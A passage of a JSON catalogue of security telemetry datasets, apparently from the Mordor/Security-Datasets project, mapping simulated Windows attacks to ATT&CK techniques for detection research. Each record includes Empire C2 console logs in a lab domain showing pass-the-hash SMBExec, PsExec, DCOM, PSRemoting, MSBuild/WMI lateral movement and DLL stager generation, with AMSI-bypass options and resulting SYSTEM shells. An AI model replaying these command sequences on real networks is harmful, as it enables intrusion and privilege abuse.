"https://github.com/EmpireProject/Empire/blob/dev/data/module_source/lateral_movement/Invoke-SMBExec.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: 7ADX8ZVR) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \n7ADX8ZVR ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         8948   5/0.0    2020-09-20 06:34:21  http            \n\n\n(Empire: agents) > interact 7ADX8ZVR\n(Empire: 7ADX8ZVR) > usemodule lateral_movement/invoke_smbexec\n(Empire: powershell/lateral_movement/invoke_smbexec) > set Hash 81d310fa34e6a56a31145445891bb7b8\n(Empire: powershell/lateral_movement/invoke_smbexec) > set Username pgustavo\n(Empire: powershell/lateral_movement/invoke_smbexec) > set Domain theshire\n(Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_smbexec) > set Listener http\n(Empire: powershell/lateral_movement/invoke_smbexec) > info\n\n              Name: Invoke-SMBExec\n            Module: powershell/lateral_movement/invoke_smbexec\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @rvrsh3ll\n\nDescription:\n  Executes a stager on remote hosts using SMBExec.ps1. This\n  module requires a username and NTLM hash\n\nComments:\n  https://raw.githubusercontent.com/Kevin-Robertson/Invoke-\n  TheHash/master/Invoke-SMBExec.ps1\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        7ADX8ZVR                  Agent to run module on.                 \n  CredID           False                                 CredID from the store to use.           \n  ComputerName     True        WORKSTATION6.theshire.lo  Host[s] to execute the stager on, comma \n                              cal                       separated.                              \n  Username         True        pgustavo                  Username.                               \n  Domain           False       theshire                  Domain.                                 \n  Hash             True        81d310fa34e6a56a31145445  NTLM Hash in LM:NTLM or NTLM format.    \n                              891bb7b8                \n  Service          False                                 Name of service to create and delete.   \n                                                        Defaults to 20 char random.             \n  Listener         False       http                      Listener to use.                        \n  Command          False                                 Custom command to run.                  \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/lateral_movement/invoke_smbexec) > execute\n[*] Tasked 7ADX8ZVR to run TASK_CMD_WAIT\n[*] Agent 7ADX8ZVR tasked with task ID 3\n[*] Tasked agent 7ADX8ZVR to run module powershell/lateral_movement/invoke_smbexec\n(Empire: powershell/lateral_movement/invoke_smbexec) > \nCommand executed with service PGUJLOAKFQFVOMHGFQPX on WORKSTATION6.theshire.local\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent 3KL8YRUB checked in\n[+] Initial agent 3KL8YRUB from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to 3KL8YRUB at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_smbexec) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \n7ADX8ZVR ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         8948   5/0.0    2020-09-20 06:57:53  http            \n\n3KL8YRUB ps 172.18.39.6     WORKSTATION6      *THESHIRE\\SYSTEM        powershell         1152   5/0.0    2020-09-20 06:57:49  http            \n\n(Empire: agents) > interact 3KL8YRUB\n(Empire: 3KL8YRUB) > shell whoami\n[*] Tasked 3KL8YRUB to run TASK_SHELL\n[*] Agent 3KL8YRUB tasked with task ID 1\n(Empire: 3KL8YRUB) > \nnt authority\\system\n\n..Command execution completed.\n\n(Empire: 3KL8YRUB) >"}, "references": null}, "SDWIN-190518210652": {"title": "Empire Invoke PsExec", "id": "SDWIN-190518210652", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["RPC CreateService", "RPC StartService", "TCP Svcctl"], "description": "This dataset represents adversaries remotely creating and starting a service via RPC methods over TCP.", "attack_mappings": [{"technique": "T1021", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_psexec_dcerpc_tcp_svcctl.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_psexec_dcerpc_tcp_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "lateral_movement", "script": "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-PsExec.ps1"}], "permissions_required": ["User"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 16:13:06  http            \n\n\n(Empire: agents) > interact UF5MYK42\n(Empire: UF5MYK42) > usemodule lateral_movement/invoke_psexec\n(Empire: powershell/lateral_movement/invoke_psexec) > set Listener http\n(Empire: powershell/lateral_movement/invoke_psexec) > execute\n(Empire: powershell/lateral_movement/invoke_psexec) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_psexec) > info\n\n              Name: Invoke-PsExec\n            Module: powershell/lateral_movement/invoke_psexec\n        NeedsAdmin: False\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @harmj0y\n\nDescription:\n  Executes a stager on remote hosts using PsExec type\n  functionality.\n\nComments:\n  https://github.com/rapid7/metasploit-\n  framework/blob/master/tools/psexec.rb\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        UF5MYK42                  Agent to run module on.                 \n  Listener         False                                 Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  ComputerName     True        ComputerName WORKSTATION6.theshire.local Host to execute the stager on.          \n  ServiceName      True        Updater                   The name of the service to create.      \n  Command          False                                 Custom command to execute on remote     \n                                                        hosts.                                  \n  ResultFile       False                                 Name of the file to write the results to\n                                                        on agent machine.                       \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/lateral_movement/invoke_psexec) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked UF5MYK42 to run TASK_CMD_JOB\n[*] Agent UF5MYK42 tasked with task ID 1\n[*] Tasked agent UF5MYK42 to run module powershell/lateral_movement/invoke_psexec\n(Empire: powershell/lateral_movement/invoke_psexec) > \nJob started: RNU5DY\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n\n[*] New agent 9CMNYX72 checked in\n[+] Initial agent 9CMNYX72 from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to 9CMNYX72 at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_psexec) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 16:17:06  http            \n\n9CMNYX72 ps 172.18.39.6     WORKSTATION6      *THESHIRE\\SYSTEM        powershell         4312   5/0.0    2020-09-20 16:17:08  http            \n\n(Empire: agents) > interact 9CMNYX72\n(Empire: 9CMNYX72) > shell whoami\n[*] Tasked 9CMNYX72 to run TASK_SHELL\n[*] Agent 9CMNYX72 tasked with task ID 1\n(Empire: 9CMNYX72) > \nnt authority\\system\n\n..Command execution completed.\n\n(Empire: 9CMNYX72) > back"}, "references": null}, "SDWIN-190518211052": {"title": "Empire Invoke DCOM ShellWindows", "id": "SDWIN-190518211052", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/18", "platform": ["Windows"], "type": "atomic", "tags": ["DCOM ShellWindows"], "description": "This dataset represents adversaries executing commands remotely via DCOM ShellWindows COM Method.", "attack_mappings": [{"technique": "T1021", "sub-technique": "003", "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_dcom_shellwindows_stager.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_dcom_shellwindows_stager.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "lateral_movement", "script": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1"}], "permissions_required": ["User"], "adversary_view": "(Empire: agents) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 17:07:59  http            \n\n(Empire: agents) > interact A7BWPR32\n(Empire: A7BWPR32) > usemodule lusemodule lateral_movement/invoke_dcom\n(Empire: powershell/lateral_movement/invoke_dcom) > info\n\n              Name: Invoke-DCOM\n            Module: powershell/lateral_movement/invoke_dcom\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @rvrsh3ll\n\nDescription:\n  Execute a stager or command on remote hosts using DCOM.\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        A7BWPR32                  Agent to run module on.                 \n  CredID           False                                 CredID from the store to use.           \n  ComputerName     True        WORKSTATION6              Host[s] to execute the stager on, comma \n                                                        separated.                              \n  Method           True        ShellWindows              COM method to use. MMC20.Application,She\n                                                        llWindows,ShellBrowserWindow,ExcelDDE   \n  Listener         False       http                      Listener to use.                        \n  Command          False                                 Custom command to run.                  \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/lateral_movement/invoke_dcom) > execute\n[*] Tasked A7BWPR32 to run TASK_CMD_WAIT\n[*] Agent A7BWPR32 tasked with task ID 6\n[*] Tasked agent A7BWPR32 to run module powershell/lateral_movement/invoke_dcom\n(Empire: powershell/lateral_movement/invoke_dcom) > \nCompleted\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent HBEW9G1D checked in\n[+] Initial agent HBEW9G1D from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to HBEW9G1D at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_dcom) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 17:08:46  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 17:08:47  http            \n\n(Empire: agents) > interact HBEW9G1D\n(Empire: HBEW9G1D) > shell whoami\n[*] Tasked HBEW9G1D to run TASK_SHELL\n[*] Agent HBEW9G1D tasked with task ID 1\n(Empire: HBEW9G1D) > \ntheshire\\sbeavers\n\n..Command execution completed.\n\n(Empire: HBEW9G1D) >", "notes": ["Windows Explorer must have an inbound rule to accept connections", "A user must be logged in (Locked enpoint does not work). I had to RDP to lab box"]}, "references": null}, "SDWIN-190518211456": {"title": "Empire Invoke PSRemoting", "id": "SDWIN-190518211456", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["PowerShell Remoting"], "description": "This dataset represents adversaries executing malicious code on remote hosts using PowerShell Remoting (WinRM).", "attack_mappings": [{"technique": "T1021", "sub-technique": "006", "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_psremoting_stager.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_psremoting_stager.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "invoke_psremoting", "script": "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/lateral_movement/invoke_psremoting.py"}], "permissions_required": ["User"], "adversary_view": "(Empire: agents) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:05:28  http            \n\n(Empire: agents) > interact UF5MYK42\n(Empire: UF5MYK42) > usemodule lateral_movement/invoke_psremoting\n(Empire: powershell/lateral_movement/invoke_psremoting) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_psremoting) > set Listener http\n(Empire: powershell/lateral_movement/invoke_psremoting) > info\n\n              Name: Invoke-PSRemoting\n            Module: powershell/lateral_movement/invoke_psremoting\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @harmj0y\n\nDescription:\n  Executes a stager on remote hosts using PSRemoting.\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        UF5MYK42                  Agent to run module on.                 \n  CredID           False                                 CredID from the store to use.           \n  ComputerName     True        WORKSTATION6.theshire.lo  Host[s] to execute the stager on, comma \n                              cal                       separated.                              \n  Listener         True        http                      Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  UserName         False                                 [domain\\]username to use to execute     \n                                                        command.                                \n  Password         False                                 Password to use to execute command.     \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/lateral_movement/invoke_psremoting) > execute\n[*] Tasked UF5MYK42 to run TASK_CMD_WAIT\n[*] Agent UF5MYK42 tasked with task ID 2\n[*] Tasked agent UF5MYK42 to run module powershell/lateral_movement/invoke_psremoting\n(Empire: powershell/lateral_movement/invoke_psremoting) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent L86DT27X checked in\n[+] Initial agent L86DT27X from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to L86DT27X at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_psremoting) > \n(Empire: powershell/lateral_movement/invoke_psremoting) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:09:08  http            \n\nL86DT27X ps 172.18.39.6     WORKSTATION6      *THESHIRE\\pgustavo      powershell         10116  5/0.0    2020-09-20 21:09:23  http            \n\n(Empire: agents) > interact L86DT27X\n(Empire: L86DT27X) > shell whoami\n[*] Tasked L86DT27X to run TASK_SHELL\n[*] Agent L86DT27X tasked with task ID 1\n(Empire: L86DT27X) > \ntheshire\\pgustavo\n\n..Command execution completed.\n\n(Empire: L86DT27X) >"}, "references": null}, "SDWIN-190518213907": {"title": "Empire Invoke Execute MSBuild", "id": "SDWIN-190518213907", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["WMI IWbemServices ExecMethod", "SMB CreateRequest"], "description": "This dataset represents an adversary remotely creating a file (.xml) via SMB and executing it remotetly via WMI and msbuild. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.", "attack_mappings": [{"technique": "T1047", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_msbuild_dcerpc_wmi_smb.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_msbuild_dcerpc_wmi_smb.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "invoke_executemsbuild", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/lateral_movement/Invoke-ExecuteMSBuild.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            \nAWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         2228   5/0.0    2020-09-20 21:33:05  http            \n\n(Empire: agents) > interact AWTK7BX5  \n(Empire: AWTK7BX5) > usemodule lateral_movement/invoke_executemsbuild\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > info\n\n              Name: Invoke-ExecuteMSBuild\n            Module: powershell/lateral_movement/invoke_executemsbuild\n        NeedsAdmin: False\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @xorrior\n\nDescription:\n  This module utilizes WMI and MSBuild to compile and execute\n  an xml file containing an Empire launcher\n\nComments:\n  Inspired by @subtee\n  http://subt0x10.blogspot.com/2016/09/bypassing-application-\n  whitelisting.html\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        AWTK7BX5                  Agent to run module from.               \n  Listener         False                                 Listener to use.                        \n  Command          False                                 Custom command to run.                  \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  CredID           False                                 CredID from the store to use.           \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n  ComputerName     True                                  Host to target                          \n  UserName         False                                 UserName if executing with credentials  \n  Password         False                                 Password if executing with credentials  \n  FilePath         False                                 Desired location to copy the xml file on\n                                                        the target                              \n  DriveLetter      False                                 Drive letter to use when mounting the   \n                                                        share locally                           \n\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > set Listener http\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked AWTK7BX5 to run TASK_CMD_WAIT\n[*] Agent AWTK7BX5 tasked with task ID 1\n[*] Tasked agent AWTK7BX5 to run module powershell/lateral_movement/invoke_executemsbuild\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent U63RL1XZ checked in\n[+] Initial agent U63RL1XZ from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to U63RL1XZ at 172.18.39.6\n\n__GENUS          : 2\n__CLASS          : __PARAMETERS\n__SUPERCLASS     : \n__DYNASTY        : __PARAMETERS\n__RELPATH        : \n__PROPERTY_COUNT : 2\n__DERIVATION     : {}\n__SERVER         : \n__NAMESPACE      : \n__PATH           : \nProcessId        : 6952\nReturnValue      : 0\nPSComputerName   : \n\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > \n(Empire: powershell/lateral_movement/invoke_executemsbuild) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http\nAWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         2228   5/0.0    2020-09-20 21:39:34  http            \nU63RL1XZ ps 172.18.39.6     WORKSTATION6      *THESHIRE\\pgustavo      powershell         3008   5/0.0    2020-09-20 21:39:35  http            \n\n(Empire: agents) > interact U63RL1XZ\n(Empire: U63RL1XZ) > shell whoami\n[*] Tasked U63RL1XZ to run TASK_SHELL\n[*] Agent U63RL1XZ tasked with task ID 1\n(Empire: U63RL1XZ) > \ntheshire\\pgustavo\n\n..Command execution completed.\n\n(Empire: U63RL1XZ) >"}, "references": ["https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/"]}, "SDWIN-190518221344": {"title": "Empire Invoke DLLInjection", "id": "SDWIN-190518221344", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/07/22", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["DLL Injection", "LoadLibrary", "CreateRemoteThread Execution"], "description": "This dataset represents a threat actor injecting a Dll (On Disk) into an arbitrary process via LoadLibrary and executd by CreateRemoteThread APIs", "attack_mappings": [{"technique": "T1055", "sub-technique": "001", "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_dllinjection_LoadLibrary_CreateRemoteThread.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "invoke_dllinjection", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/code_execution/Invoke-DllInjection.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire) > usestager windows/dll\n(Empire: stager/windows/dll) > \n(Empire: stager/windows/dll) > set Listener http\n(Empire: stager/windows/dll) > info\n\nName: DLL Launcher\n\nDescription:\n  Generate a PowerPick Reflective DLL to inject with\n  stager code.\n\nOptions:\n\n  Name             Required    Value             Description\n  ----             --------    -------           -----------\n  Listener         True        http              Listener to use.\n  Language         True        powershell        Language of the stager to generate.\n  Arch             True        x64               Architecture of the .dll to generate\n                                                (x64 or x86).\n  StagerRetries    False       0                 Times for the stager to retry\n                                                connecting.\n  UserAgent        False       default           User-agent string to use for the staging\n                                                request (default, none, or other).\n  Proxy            False       default           Proxy to use for request (default, none,\n                                                or other).\n  ProxyCreds       False       default           Proxy credentials\n                                                ([domain\\]username:password) to use for\n                                                request (default, none, or other).\n  OutFile          True        /tmp/launcher.dll File to output dll to.\n  Obfuscate        False       False             Switch. Obfuscate the launcher\n                                                powershell code, uses the\n                                                ObfuscateCommand for obfuscation types.\n                                                For powershell only.\n  ObfuscateCommand False       Token\\All\\1       The Invoke-Obfuscation command to use.\n                                                Only used if Obfuscate switch is True.\n                                                For powershell only.\n\n\n(Empire: stager/windows/dll) > execute\n\n[*] Stager output written out to: /tmp/launcher.dll\n\n(Empire: stager/windows/dll) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n712ETU3B ps 172.18.39.5     WORKSTATION5      *MORDOR\\pgustavo        powershell         9076   5/0.0    2020-07-22 03:52:58  http            \n\n(Empire: agents) > interact 